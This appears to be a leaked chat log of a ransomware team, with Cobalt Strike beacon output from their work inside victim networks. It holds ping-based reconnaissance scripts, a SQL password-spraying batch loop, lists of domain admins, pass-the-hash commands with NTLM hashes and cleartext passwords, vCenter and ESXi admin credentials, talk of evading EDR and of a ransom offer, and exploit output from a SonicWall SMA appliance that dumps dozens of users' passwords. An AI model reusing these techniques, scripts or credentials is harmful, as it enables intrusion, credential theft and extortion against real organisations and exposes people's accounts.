    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
```
user 2-2
```
beacon> shell ping TLCBENTS01.loomisco.com
[*] Tasked beacon to run: ping TLCBENTS01.loomisco.com
[+] host called home, sent: 59 bytes
[+] received output:
Pinging TLCBENTS01.loomisco.com [192.168.8.165] with 32 bytes of data:
Reply from 192.168.8.165: bytes=32 time<1ms TTL=127
Reply from 192.168.8.165: bytes=32 time<1ms TTL=127
Reply from 192.168.8.165: bytes=32 time<1ms TTL=127
Reply from 192.168.8.165: bytes=32 time<1ms TTL=127
Ping statistics for 192.168.8.165:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
```
setlocal enabledelayedexpansion ?
In an hour you can ping by hand.
Pinging by hand, just sit on it for an hour.
Has anyone thought that if you catch an error in the console, it is logged somewhere on the server, or even raises some alert?
User, I asked to do it quietly.
Ping from each session, run from all cobs.
The file is the same.
Is the output from your ping from two cobs?
In the beacon the error is pinged.
Above there was a check.
You also do not agree with each other.
With the same error.
I asked 2 hosts to check.
It has not changed.
The file, I cannot see it.
The file went to 692, that's why I asked to throw the command.
-output
3388
Not all sessions I see there.
And run the file.
I have `C:\Users\pgo.bat` and inside the batch file you have a
relative path to ping. How do you think it will run?)
`C:\windows\system32\ping.exe` is where it lies; you are in `C:\ProgramData\ping.bat` and run `ping`.
And has anyone thought about prioritization? Specifically about the rat; remember I asked you about environment variables.
Me: *please ping 50 hosts as quietly and automatically as possible*
The rest of you: I'll do it!
```
@echo off
for /f %%i in (HOSTLIST.TXT) do (
    timeout /T 3 /nobreak
    ping %%i -n 1 -4 >> pingedhosts.txt
)
```
With this I do not understand what the problem is; yes, there is the error, but the ping passes, and the outfile is not assembled correctly.
(Again you poke everything in a row? What kind of house do you have there?)
```
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another
```
I've dropped the priority of the ping.
To jump to the system processes.
Now the mstsc processes.
Is the second command cob)))))))))))))
-4?)
I
-n 1 -4
I guess it's counting down from -4, where is it coming from?
```
@echo off
for /f %%i in (HOSTLIST.TXT) do (
    timeout /T 3 /nobreak
    ping %%i -n 1 -4 >> pingedhosts.txt
)
```
And this?
Is a batch file in the studio.
```
beacon> shell pgo.bat
[*] Tasked beacon to run: pgo.bat
[+] host called home, sent: 38 bytes
[+] received output:
ERROR: Input redirection is not supported, exiting the process immediately.
ERROR: Input redirection is not supported, exiting the process immediately.
```
```
Pinging LDSWYO21.loomisco.com [192.168.0.69] with 32 bytes of data:
Reply from 192.168.0.69: bytes=32 time<1ms TTL=128
Ping statistics for 192.168.0.69:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
Pinging LOOMISGT2.loomisco.com [192.168.0.57] with 32 bytes of data:
Reply from 192.168.0.57: bytes=32 time<1ms TTL=128
Ping statistics for 192.168.0.57:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
```
I wrote `fix`: remove loop 1 and `echo %s:%p >> result.txt`.
On timeout.
There was a batch file; you should have fixed it in places and just replaced osql with ping:
```
for /f %s in (srv.txt) do @ (for /f %p in (pwd.txt) do @ osql -S %s -U sa -P %p -Q "select @@servername" >> result.txt && echo %s:%p >> result.txt)
```
Write @echo off at the beginning.
1>>
Output file:
```
Pinging LDSWYO21.loomisco.com [192.168.0.69] with 32 bytes of data:
Reply from 192.168.0.69: bytes=32 time<1ms TTL=128
Ping statistics for 192.168.0.69:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
Pinging LOOMISGT2.loomisco.com [192.168.0.57] with 32 bytes of data:
Reply from 192.168.0.57: bytes=32 time<1ms TTL=128
Ping statistics for 192.168.0.57:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
```
The batch file error:
```
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
The process cannot access the file because it is being used by another process.
```
```
beacon> shell pingtimeout.bat
[*] Tasked beacon to run: pingtimeout.bat
[+] host called home, sent: 46 bytes
[+] received output:
C:\users>for /F %i in (HOSTLIST.TXT) do ( timeout /T 3 /nobreak ping %i -n 1 -4 1>>pingedhosts.txt )
C:\users>( timeout /T 3 /nobreak ping LDSWYO21.loomisco.com -n 1 -4 1>>pingedhosts.txt )
ERROR: Input redirection is not supported, exiting the process immediately.
C:\users>( timeout /T 3 /nobreak ping LOOMISGT2.loomisco.com -n 1 -4 1>>pingedhosts.txt )
ERROR: Input redirection is not supported, exiting the process immediately.
```
You yourself are delaying progress.
It's only 5% of the workload today.
The ping test takes forever, so what?
And what is the problem here?
At most google it; fine, at least yandex.
Did not ping) under the vpn? on the dedic....
6 minutes to throw a batch file, a file with 2 hosts, and run? Why so long?
On 2 hosts first, check the total report form.
Yes, at the post-ping stage already determine whether the hosts are interesting or not.
In the cycle: ping - sleep.
Just asked the guys to write a batch file.
Are you pinging by hand?
I'm not talking about the batch file in the context of batch commands.
Does sleep even exist? Again you do not think?
If you do it by hand, after each ping write sleep 3?
What?
Also search the file and substitute a string in the ping command + sleep.
Yes, you had a batch file for almost similar actions) add the sleep there, which was thrown on the forum?
A batch file to ping this list at intervals of 3 sec.
Excellent.
```
TLCDC2.loomisco.com
TLCDC1.loomisco.com
Termsrv5.loomisco.com
TERMSRV.loomisco.com
TermsrvVendors.loomisco.com
loomisgw2.loomisco.com
LOOMISBENSQL01.loomisco.com
STORAGE.loomisco.com
IMAGING2-NEW.loomisco.com
Traveler1.loomisco.com
WebChat.loomisco.com
TLCWEBP1.loomisco.com
TLCWEBT1.loomisco.com
MITELWINSERVER.loomisco.com
Wyomissing_Ex1.loomisco.com
Printsrv08.loomisco.com
VeeamBackups.loomisco.com
EobStorage.loomisco.com
LOOMISFAXR01.loomisco.com
TLCMONITORING.loomisco.com
loomiswebsrv4.loomisco.com
TLCWebP2.loomisco.com
ScanStorage.loomisco.com
FSITrack.loomisco.com
PDFStorage.loomisco.com
TLCSophos.loomisco.com
TLCSKLM1.loomisco.com
TLCSKLM2.loomisco.com
LoomisIndioDB01.loomisco.com
Printsrv16.loomisco.com
LOOMISFAXR02.loomisco.com
TLCStorage1.loomisco.com
TLCAutoTFR.loomisco.com
Loomissftp1.loomisco.com
EpicAPM.loomisco.com
loomisgwdb2.loomisco.com
Metafile-vm1.loomisco.com
TLCANALYTICS1.loomisco.com
LDSWYO21.loomisco.com
LOOMISGT2.loomisco.com
TLCEPICAS01.loomisco.com
TERMSRV1.loomisco.com
TLCAutoTF2.loomisco.com
TLCEPICCS01.loomisco.com
TLCEPICDB01.loomisco.com
TLCEPICTS01.loomisco.com
TLCEPICTS02.loomisco.com
TLCRDSLIC1.loomisco.com
TLCSQLDB1.loomisco.com
TLCEPICIIS1.loomisco.com
TLCBENTS01.loomisco.com
TLCBENTS02.loomisco.com
```
Do not run the ping list binary on all servers here with a mass ping; reduce the amount of traffic and make one ping per host.
Default is 4 pings per hostname; no need to do the usual `ping hostname.com`.
Total: 53 names * 3 sec = 150 sec for the entire ping of the servers.
Exactly, after 1 ping sleep 2-3 sec.
Ping neatly now; take the list of their hostnames.
This is further.
15
Carefully.
53 server OS in the domain.
Carefully, this DC question, what?
```
Server Name      IP Address
-----------      ----------
TLCDC1           192.168.0.192
TLCDC2           192.168.0.222
```
How many servers in the domain?)
Ahead of edr, av.
1) Look for trusts; if there is a need, get into each of them.
Determine the scale + as you go along write yourself a plan and designate the steps.
The other, just on the netmask, continue to look for configurations of vpn or something else?
Running.
All, announced; then take on a personal cob whoever in the general one does not fly, or dll, well, you know the methods.
You know, don't spawn sessions yet; we have not a minute, let's go, all downloaded and opened a session.
Good.
Head, don't do 20 sessions in the cob; if you want you can work on the general cob for the team, or on your own personal one.
Go here, to be in front of my eyes.
Took the AD info and stuff from here.
Yeah, now only scanstorage does not hang.
Forward.
Did you have a lot of them?
user4 user8 user3 pass the session to the first group.
```
https://sky-vcenter65.skytech1.local/websso/SAML2/SSOSSL?RelyingPartyEntityId=aHR0cHM6Ly9za3ktdmNlbnRlcjY1L3ZzcGhlcmUtY2xpZW50L3NhbWwvd2Vic3NvL21ldGFkYXRhlacol.1hcetyks.56retnecv-yks
```
```
https://sky-vcenter65.skytech1.local/websso/SAML2/SSO/vsphere.local?SAMLRequest=zVRbb5swFH7fr0B%2BBwMhl1olVdasWqV2zUo2TXuZHHOSWAOb%2BRhI%2F%2F0MSbasaqs87hE45zvfTVxe7crCa8Cg1ColURASD5TQuVSblHxZ3vgTcjV9d4m8LCo2q%2B1WPcKvGtB6M0Qw1q1da4V1CSYD00gBtyqHXUoc0NyNScVtD721tkJGKf588hsByoIZDQP3ZEFso6DQghe0hRWiptns%2Fi6mWfZAG6y2YGD%2FmXg32gjoWaRkzQsE4t3OU%2FIjGa34IOTrZDQOxzDkwyHk6%2FHkYpxMRsk6FG4MFxxRNvB3EbF2ZNFyZVMSh9GFH478aLgMYxZGbBAFkzD8TryF0VYLXbyXau9KbRTTHCUyxUtAZgXrCLM4CNlqP4Ts43K58BcP2bIHaGQO5pObTsk%2F%2BlmSDIj39Wh%2F3NnvAlHIesPfvlUdiJHpIZ5ekTkfgB8TJNMX06G1pB3MMZYSLM%2B55Zf09N7%2BelyxTt%2FtfKELKZ68WVHo9toAt06zNTX04ZXcvk2peyNzf92PsqozBq2jQ7xs0eF%2Frnkh1xLMK4V6jfKprfG5vtKDNOYansvOKDyFOdvc5ygHkMat7GU4FU3ZctdzoUuKYgslR8qtNX4PTF07Yxom9MPOmdF1BY%2BCdij%2FYLRtG7SDQJuNWwgj%2Bu3%2BLuuxfNnXXLgQ3DyzT5ULpTvPHkFBy1cFLN27FwT%2FR1TnUMDmlCp9Hs70WMzT%2F9T0Nw%3D%3D&SigAlg=http%3A%2F%2Fwww.w3.org%2F2001%2F04%2Fxmldsig-more%23rsa-sha256&Signature=eRWAEo1neECMdgPBw4japogtN7ytgmx1WzNL0VGEaYILRx3sY3nsk0rPEnd5C2p8HFEdQo
Gid8aNA9dpZUHnuez%2F ``sphere didn't find no passwords saved anywhere, go there from two DAs, their cars are not in the help3nets all ready? Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- $DUPLICATE-2119 ABT ABT_NOC bbesadmin BESAdmin ccg ChuckM DP.Admin dpmonitoring dtake hcohn justinladmin kton lvetula mech.admin mmiller pcsupport ppad ppope printer RIVERBED scadmin skyadmin The command completed successfully. [+] received output: Group name Enterprise Admins Comment Designated administrators of the enterprise Members ------------------------------------------------------------------------------- ABT DP.Admin dpmonitoring lvetula skyadmin vmtaccess - pass !scheduler! The command completed successfully. pth SKYTECH1.LOCAL\bbesadmin b7e996a9282b045b181ab26ba27f6242 $uperm@n pth SKYTECH1.LOCAL\ChuckM 357f64ecfb2e984a0357ebe783a67b5d C@mion60% pth SKYTECH1.LOCAL\dtake 70b0745f98701b7e845ee0f643f72396 pth SKYTECH1.LOCAL/kton 89d585960d5cc84307a58cc796c056 pth SKYTECH1.LOCAL\mmiller bab390b9b53882a294c052f279709832 pth SKYTECH1.LOCAL/ppope 1cc7f9f96985a521d4f446baa4d317222 pth SKYTECH1.LOCAL/scadmin d8ed94135ac1934f65715849bb23158f pth SKYTECH1.LOCAL\ABT 219ec549d9c21c9ff299ff0c9bb6c713 pth SKYTECH1.LOCAL\BESAdmin b7e996a9282b045b181ab26ba27f6242 pth SKYTECH1.LOCAL\DP.Admin.3de232cafad8fe4bbcb8439b38ea53ea 2qlp30m@10! pth SKYTECH1.LOCAL\hcohn 674e48b68c5cd0efd8f7e5faa87b3d1e pth SKYTECH1.LOCAL\pcsupport 1f94856253679db5c13219e28209af6f pth SKYTECH1.LOCAL\printer c3bc7de91d256a9981721bc321eaaece pth SKYTECH1.LOCAL\skyadmin 4c56183000f9766dc2881881af3030e8 !FlyB0y! 
pth SKYTECH1.LOCAL\ABT_NOC 13ce9c02efe8314fa80702ea14a77b57 pth SKYTECH1.LOCAL\ccg c66c74eeb51a62cc730835b62145f56f pth SKYTECH1.LOCAL\dpmonitoring 6850366281608a824050d3de0435ea87 pth SKYTECH1.LOCAL\justinladmin cb81135da647477b7617cd6a88c769f9 pth SKYTECH1.LOCAL\mech.admin 3c6a21328ef5eb39401dadadc79785c0 pth SKYTECH1.LOCAL\ppad 27ecb8e1762139addd7ab2952f2314e0 pth SKYTECH1.LOCAL\RIVERBED 073db11c8586bc9280708d8c95c86ff6 SKY-BEDMW-01.skytech1.local - VEEAM BACKUP SERVERS sky-beuza-01.skytech1.local DMW-CHUCKM1-PC.skytech1.local admin PC's 10.0.6.54:445 (platform: 500 version: 6.1 name: SKYNASJEN domain: WORKGROUP) NAS admin/password FS visible from YES 10.0.6.83:445 (platform: 500 version: 4.9 name: LS520DC5F domain: WORKGROUP) nas 10.0.6.153:445 (platform: 500 version: 4.9 name: SKYNASDMW domain: SKYTECH1) nas 10.0.2.127:445 (platform: 500 version: 6.1 name: SKYNASSC domain: VOLUME) nas Website: https://sky-vcenter65.skytech1.local Username: 'administrator@vsphere.local' Password: 'Superm@n2018' https://10.0.2.32/ui/#/login ESXi' root\$uperm@n https://10.0.2.34/ui/#/login https://10.0.2.36/ui/#/login https://10.0.2.38/ui/#/login https://10.0.6.24/ui/ ``Go to sleep all night, the session is in the slip, the files have been deleted. good night good love is more expensive than money)apparently:D braggingbamba why is it here?)and morefiles were lost? in the slip have thrown sessions? 
Good night.
Good night then.
This is roughly 4-5 nights, and until the end.
Until we close two networks.
Tomorrow by 16:00.
So we shift to day 4.
Tomorrow night close.
If tomorrow morning it will not work.
Tomorrow morning be in place by 11.
In the morning close the network.
By 10 today.
Come on then, close it today..
571
The cob you have on the team is the second cob.
Do not even need it.
Less than 100 servers, although the network is not big.
And if the armas to mount the servers, we will do with what is there.
I think just take your colleagues.
Tomorrow another 4 planned in total.
If you have everything ready we can do it today.
Will it also close tomorrow?
No, with the last cob there is a problem; most likely it will be replaced tomorrow.
Wait for the cob today?
If there is a problem, then feedback here; or if in the lsv case you have doubts, you can check in your conditions (on the dedic).
I had it the day before yesterday, I think, assembled - it works. And @user9 today I did it, it does not work. Hehehehehe
Nevertheless I had a feeling that he would be fine if he got a little frustrated.
Really, right now there are only a few armas in the network. Yesterday there were more.
@user4 on the classic zamap to the servers?
Looking for access to the trusts, trying to pull the network into cob nasa, check the options, how to interact with armatak.
Write me here, 1 person from the team, 1 message: what are we doing now on your networks.
Me mixed up)
@user9 you had 4.2, distribute to all please.
+
@user7 pass it on to your colleagues?
Or are you stupidly not allowed to take only a new one?
Wait all day.
Come on, hurry up.
1 delayed.
There are 2 cobs.
New.
Okk.
@user8 then.
Ok.
Don't care.
I need help. @user8 and @user4 who wants where?
@user7 @user9 I haven't created anything yet.
And I haven't created anything for you? I don't have a conf) or you mean #lrhc-org?
@user7
Also @user9 write a report in the conf.
I'm picking SNU.EDU.
I have devry.edu, but I'm there a week already digging and practically in a deadlock.
Who has what tasks at the moment?
:man_raising_hand: hello all :space_invader:
Tomorrow both are closing.
Done the other 2.
Blocked by this, there is no ping.
Setup according to the manual through the system interface, no.
Config.
ser:IntSniDPlT6NZww6lqxw `206.221.176.24:12372`
Give us the config.
I have no scanner on the dedic.
Even if they dropped the cob? So what? We are not going to forward sessions from the network.
Sessions from the dedic are stalled. If the dedic is locked, then yes.
???
keymiss.com
kimhd.com
If we need our dedic and vpn in the cob.
???
What's the cob got to do with any of this? I take it the cob was dropped.
What the fuck is your problem with the dc? Maybe the icmp's just blocked.
Just scan it to 445, just to get the whole thing.
```
C:\Users\user>ping -n 1 172.17.70.8
Pinging 172.17.70.8 with 32 bytes of data:
Request timed out.
Ping statistics for 172.17.70.8:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
```
The name was resolved without a block, then 172.17.70.8 from the dedics behind the VPN.
```
Pinging evo.local [172.17.70.7] with 32 bytes of data:
Request timed out.
Ping statistics for 172.17.70.7:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
```
And what's stopping him from hitting rdp or something?
I think a couple of exact 6am starts to clean us?
3
I told you, admins are scared of any alerts; they're 3 kilometers away, the net is probably fucked up, you just spammed the alerts on the cb.
The dc is unavailable, sessions are down again; the main thing is to remember the accesses and settings, and preferably look for ones that are closer to the geo, because the channel will be the speed.
@tl1 will give here.
You can take the brute-forced daikas for 2-5 bucks, any I reckon? And put everything in nul.
Max: kill net services and processes by batch files on the net remotely; just a few daikas on vpn will start.
Why it will not do.
Carbon, yes, I think, if it is not cut off, we do nothing here.
On carbon often 2fa?
Yes, the vpn works.
I can't see the ldap, it won't give out anything.
I can't get it to work over the dub. Over the vpn it doesn't work?
In some cases I've had to run mimic a few times; any command you run apart from ps\ls and so on, you run it and the session dies.
How do I get the backupkey without mimic?
Nope, I don't have time to run mimic - the session dies.
But I don't believe it, you need the domain masterkey, I'll try to take it off.
Do it like we did when we discussed chrome.
We can't take it off, it kills the session after 10-15 seconds)
If you need the context of a remote, or make_token if you need the context of a user)
Well fuck it)
cb any injector chops cob or av.
On servers / armas, why I do not know. After about 10 seconds it falls off. Logging in with dedics here, how and why? Sessions are dropping (((
```
* Username : vipreadmin
* Domain   : N0fUck!NCr1++3r$
```
The drop in revenue has directly affected our margins :(
The faithful have long noticed that everyone starts with 10 percent.
1 quality lock))) apparently they are with the ends of the locks, funny)
340k offer)
On overland, negotiators already)
+
Hold both.
```
[+] Checking URL https://66.161.144.31
[+] Found latest version (9.x+) of SMA appliance
[+] Appliance running version 10.2.0.3-24sv
[+] Leaking sessions to dump configuration.
```
[+] Found: SessionID: 0hxjuDPHx83Rx4vG8T96wfFnQJGVF4UZhT4JrIxBFCYU= userType: 1 userName: rhaffey Password: Carebear11 Domain: Planes [+] Found: SessionID: 1XVOagEBBe6ptLv3yQbhtq0lFpb10KBXlKkRrxUhoKw= userType: 1 userName: mwest Password: Howklmw4 Domain: Planes [+] Found: SessionID: 1ckROGo1Wh7imySZPl7uMtcThtOiXie239BHZP95Xho= userType: 1 userName: grikmim Password: mrckk-0020 Domain: Planes [+] Found: SessionID: 8hrnUTXzfeMdpqBv0uQ6bZG13AJC8QIEezcikn6rRlU= userType: 1 userName: gexnill Password: Fruitninja22 Domain: Planes [+] Found: SessionID: 9pJuG9Tld0RDo08uJYlOoGD0VrQvFKue6qkPfip2dVI= userType: 1 userName: romber Password: Gberry700! Domain: Planes [+] Found: SessionID: DNmFdoJaPCMVDgQ1Z4FwvwMTE5QBqtFMiwBe9BOMZjQ= userType: 1 userName: mitriks Password: AEVT030121! Domain: Planes [+] Found: SessionID: EWtPIi0Eb05MnQhVXQLSqCTNnEtoz5GqRL0WLvU17sk= userType: 1 userName: redgemmtb Password: Tr! [+] Found: SessionID: NeCBR0enViW4ICjFiFeW1F8D92KfgWrTvWgv6007TKM= userType: 1 userName: jmurchis Password: Sabian44987#@ Domain: Planes [+] Found: SessionID: OSKex2Y0GoB38oixxxdQQYc0MT5nKJxf4oeKdSo8yxI= userType: 1 userName: kinjens Password: Greeleys7145 Domain: Planes [+] Found: SessionID: PFCReDwF0qqxJW36ByuCDpZ5J0Zhdl6AfZr8rwFyNEbo= userType: 1 userName: cenglish Password: Alexa019 Domain: Planes [+] Found: SessionID: S52bhF0epI6AWy2O5NVtpUT5rZR2qlVUIRxpfSUXnoM= userType: 1 userName: tilewa Password: Odin2021 Domain: Planes [+] Found: SessionID: SiHFTV6qqKeYsOaTDH8xA4PkOvUW36syhQlhyZjBE30= userType: 1 userName: lesdorn Password: MountVernon25** Domain: Planes [+] Found: SessionID: W1lJsx3fZ100ndMXQPAceYzqyXC1spoSv0zMq5a5hpg= userType: 1 userName: kyteldra Password: Kcakalpld0517! 
Domain: Planes [+] Found: SessionID: WCrZqMccVULFytN0wPY4rB8K636yaP5cV1W5911pRdg= userType: 1 userName: keynemik Password: LumbarL3 Domain: Planes [+] Found: SessionID: Z9sppmZwgJec3Jk0Kcv05sSmQvFwyoe0UVGkv251SeM= userType: 1 userName: dmontgom Password: January2021 Domain: Planes [+] Found: SessionID: advcBv38ZtYqUBAZCVVJl6QoZahzK0UPV5JGBzpLNgk= userType: 1 userName: valura Password: Lacapi2021 Domain: Planes [+] Found: SessionID: bBNhpCwSpZvM7dA04zlPGZvJoBZdk4Z6HMu9wGm3FVg= userType: 1 userName: jmcgrath Password: 36R-mel*21 Domain: Planes [+] Found: SessionID: djXXAOgtFljaj3O9l7OgG2VC8fyYPyPkjb5j1BF1QCNMI= userType: 1 userName: gkeifer Password: Hrmboys8! Domain: Planes [+] Found: SessionID: fUvKJ6qa7PkHQWQWcOeUBBRJctY4JUqJtUGDLVSzLGgns= userType: 1 userName: gcarney Password: Happy2021 Domain: Planes [+] Found: SessionID: kVgDYoRK1ajqbOijrK1uGLNeXE0T99We5MlZSPkXCg= userType: 1 userName: bbradford Password: H@ndb@ll2021 Domain: Planes [+] Found: SessionID: kv38f02A9WSGjNj0xjVedVFinxYdWiyeNZ4aXnYOtCkE= userType: 1 userName: esolotim Password: Qwerty19 Domain: Planes [+] Found: SessionID: lY1v5WeWLHRc2qZQyyrHLtBc4rdOk9LzTvffD108Tc= userType: 1 userName: fsmith Password: Castle47####### Domain: Planes [+] Found: SessionID: n6R7KD4fgc11jsFwF0KV5iduYKRSPyveO22K7zCO1CE= userName: 1 userName: barnlisa Password: ROSIEb22 Domain: Planes [+] Found: SessionID: nRoJ3ZfgAlELS0rtqpLJtpXwRJ6OcBNVflg9KxlcX1s= userType: 1 userName: croltiny Password: globalWORKplace7! Domain: Planes [+] Found: SessionID: qB1kBsFrKOLYL4w9aOktA6jYoJTMc68KRJJoXo3siXCnE= userType: 1 userName: mwinters Password: Carnage2021 Domain: Planes [+] Found: SessionID: u0Xqpn7w8fS4vZn6SAO1JFUYHUTczh5Y5yeoxebQWWg= userType: 1 userName: sanski Password: Jac2010! 
Domain: Planes [+] Found: SessionID: uxs9u9LxBrtY1Oqrx3WuEJPXOsEvmhgMhvr1JHl3rRw= userType: 1 userName: mshafor Password: February2021 Domain: Planes [+] Found: SessionID: v1buCFcYonMDuhyVfRnHwBh6YgNpqjwhTSe5eSMoYu8= userType: 1 userName: ferncroa Password: Bengals21 Domain: Planes [+] Found: SessionID: v5i1hwKI0xbE01s9nPuO9F531n0MxrNE0YYyyel2za0k= userType: 1 userName: wbowen Password: Dptwmb2028 Domain: Planes [+] Found: SessionID: vu19JgbC8zsPGm0q8phBOqUsKIFtkn9itd00j06MuAI= userType: 1 userName: gflasch Password: Pepper33$ Domain: Planes [+] Found: SessionID: wGwVAfJOrLok0CrbbB7g9dUQAlZP2YsQmw9p1113thE= userType: 1 userName: jamafd Password: Hobart2535y Domain: Planes [+] Found: SessionID: wbL2CzsEWESKJxcQw13TBJ7ebU4i6bl7qnffGC0n8Afw= userType: 1 userName: obrown Password: Planes0121 Domain: Planes [+] Found: SessionID: yNylXi0x041YdNCoxmjaGiwG5Y22WNb4tcqD5Dkid1Y= userType: 1 userName: moordavi Password: Planes1! Domain: Planes [+] Done with https://66.161.144.31, found 33 sessions `````` [+] Leaking sessions to dump configuration. [+] Found: SessionID: 1jHJ05pyjLQw0GZvgyDhnE2jJwv0sFnc9toWZFFQpSM= userType: 1 userName: suanino Password: Hotshots23 Domain: L&M Domain [+] Found: SessionID: 2urLQzwRsyR8FeQ16VaeYISe9gx2GjzEsv72IJeAvgs= userType: 1 userName: rcarrington Password: Rlcbkjcngm987! Domain: L&M Domain [+] Found: SessionID: 79iXsjaZpFZpfHSj3Ij1jtx8nABpP8QVMWftVldHrMaw= userType: 1 userName: mlong Password: Joshua2013!!!!!!! Domain: L&M Domain [+] Found: SessionID: 8toG4Gmy3DmF9dC4SIG8xGNjILAsXynGs8QT1mr6tHU= userType: 1 userName: kurban Password: DeerHunter22! Domain: L&M Domain [+] Found: SessionID: 8z190N9G2yCG14bTKpo68J0XDqzOCwPh5mQCheC8DPw= userType: 1 userName: nfranklin Password: Sundae24!!! 
Domain: L&M Domain [+] Found: SessionID: 9dJs2tiaLfZpV0Ma7g79oY1aG4FvW79kZIkVJU7tnqQ= userType: 1 userName: tegan Password: Mylilbuddy1 Domain: L&M Domain [+] Found: SessionID: ANDOyUyyl83haHEqaDbW13thjxrxpXsySbIXwK0rcGw= userType: 1 userName: rcraighead Password: Afapek112819 Domain: L&M Domain [+] Found: SessionID: Di0eR39DlxGZqqkVMdkQ20bSKw4z2Uo2zHnxAQZrC0S4= userType: 1 userName: terriw Password: Merrow3s934 Domain: L&M Domain [+] Found: SessionID: GIzvltAkPe26aebMF4CtohrIBaJrtO7FLvYslvZE0Iw= userType: 1 userName: mwilson Password: RiverMae@11 Domain: L&M Domain [+] Found: SessionID: GJwdPkGWSom4T4JP1JPooIVCY5voOguyrBsZmjFUaeLtg= userType: 1 userName: kcarrington Password: G@lDR063r6 Domain: L&M Domain [+] Found: SessionID: InbYkxJ3mH25VGAHIQb01Iqsgiigau3AhN2G7XJprHQ= userType: 1 userName: ssimmons Password: Coffee123! Domain: L&M Domain [+] Found: SessionID: Kk4ZwUtcpCl7ozEkAKv001HZlGnPaaTlZLr6g3HJsRw= userType: 1 userName: hmckinney Password: Family2020! Domain: L&M Domain [+] Found: SessionID: MovBR6w0IEb3zi10yKeZEQAxhnX6FvffdnToB52EGlY= userType: 1 userName: Bjones Password: @pr!lSh0werz1997ch Domain: L&M Domain [+] Found: SessionID: NjNnAwqla1uOuTn1fn1fE3p5XNvQ5Ox9JXAICPmWv0PPUk= userType: 1 userName: sbushnoe Password: Winter2020! 
Domain: L&M Domain [+] Found: SessionID: R1n01UtSop80AzxWza6lGCvBgqhRUvWoaO37cF7wG7A= userType: 1 userName: bjohnson Password: Multigard!@#$ Domain: L&M Domain [+] Found: SessionID: WFv4gr1f2DaaoE5KVayg4otU6hdLdFqWXYm8EM60PrcE= userType: 1 userName: toutman Password: Lightning02 Domain: L&M Domain [+] Found: SessionID: WTxex4JI0WxT5BhqrexrtTTALLHvU5A2QYohVpxtvjs= userType: 1 userName: georgew Password: 195Deeznuts$ Domain: L&M Domain [+] Found: SessionID: XhI3mae1Lxc7KLkcqqTkfi1S7lp5nW911N72LTQom0Yc= userType: 1 userName: tshaw Password: lamTEN#5053 Domain: L&M Domain [+] Found: SessionID: YwTFCvcrti79HYq8DTV43VU5vhqHC4cNzcC86OLunyc= userType: 1 userName: rdake Password: Carsyn12345 Domain: L&M Domain [+] Found: SessionID: bKVOGsqTD6dIGUfLaLeoraJyswAbkDZftcVW5QeKsPY= userType: 1 userName: jzeman Password: Bluebird11 Domain: L&M Domain [+] Found: SessionID: cCMKVWpdz76nmwmUSFilNoqlHRLefonQH0llEt8T0G8= userType: 1 userName: moscar Password: $Shell123456789 Domain: L&M Domain [+] Found: SessionID: gamTBY5ApMu1IIyMn4x9VztNpfYws0p5fLOw2VejseY= userType: 1 userName: mgarrison Password: Roscoe1971! Domain: L&M Domain [+] Found: SessionID: h3nDgyEj7JDo8BaSNkaxJbgM80kv15xVXLqeobLWI0w= userType: 1 userName: lindab Password: Hobart528$20211 Domain: L&M Domain [+] Found: SessionID: jszrMOtthNXAO10JW5RIO7MW18D5isBJlOb02qBGEBQ= userType: 1 userName: dlindblad Password: Hicksville83 Domain: L&M Domain [+] Found: SessionID: lJjQi2ri9viQWQ1XEmCvrAfnmmV3Ev2CS0wwq92riAs= userType: 1 userName: tbishop Password: 